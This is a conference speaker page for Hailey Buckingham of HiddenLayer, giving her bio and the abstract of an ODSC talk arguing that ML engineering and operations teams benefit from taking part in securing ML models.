Hailey Buckingham

Hailey Buckingham

Director of Data Science at HiddenLayer

    Hailey Buckingham is the Director of Data Science at HiddenLayer, and responsible for the strategy, planning and execution of our AI and ML initiatives. Her career has spanned multiple industries, including Finance, Transportation, Wildfire Policy, and Cybersecurity where she built and managed research and engineering teams and data science programs and played a pivotal role in the development of some of the first AI adversarial countermeasures. She has extensive experience architecting enterprise scale ML solutions and leading the cross-disciplinary teams which deliver them, and especially focuses on maintaining highly functional, interoperative teams of experts which make large-scale AI projects possible.

    All Sessions by Hailey Buckingham

    Day 2 04/24/2024
    3:30 pm - 3:40 pm

    I don't always secure my ML models, but when I do...

    <span class="etn-schedule-location"> <span class="firstfocus">ML Safety & Security</span> </span>

    Cyber attacks against ML and AI systems are becoming more and more frequent. Public, open source ML models are essentially code-as-data, which puts our organizations at risk. But whose responsibility is it to secure these systems? ML Operations and Engineering teams already split their time between operationalizing ML systems and researcher enablement. Adding security workloads might seem like a step too far. However, there are many benefits that ML teams can yield by taking part in security concerns which may make the effort well worth it, not only for the overall organization but for the ML team themselves. Spending cycles on security hardening is far from desirable for most ML Operations and Engineering teams. At first glance, engaging in an entirely new discipline would seem like folly given the already diverse set of disciplines ML and AI projects require. Furthermore, shifting security operations responsibilities onto teams which likely have little or no security training should reasonably raise at least one eyebrow. But looking a little deeper, it turns out that there are a lot of good reasons for ML Engineers, ML Ops teams, and even Data Scientists to participate in security thinking and planning. From deeper understanding of the ML systems themselves, to insights into user behavior, to reinforcing good operational habits, the benefits to the ML-based teams are plentiful. And that’s even before an ML-based security event comes into play. In this talk we’ll dive into each of these areas in detail. We’ll discuss how using security tools specifically designed for AI can precipitate a number of additional benefits which are likely already on the ML teams’ wishlist. These same tools will also help increase collaboration with security teams and improve the organization’s security posture.

    Open Data Science

     

     

     

    Open Data Science
    One Broadway
    Cambridge, MA 02142
    info@odsc.com

    Privacy Settings
    We use cookies to enhance your experience while using our website. If you are using our Services via a browser you can restrict, block or remove cookies through your web browser settings. We also use content and scripts from third parties that may use tracking technologies. You can selectively provide your consent below to allow such third party embeds. For complete information about the cookies we use, data we collect and how we process them, please check our Privacy Policy
    Youtube
    Consent to display content from - Youtube
    Vimeo
    Consent to display content from - Vimeo
    Google Maps
    Consent to display content from - Google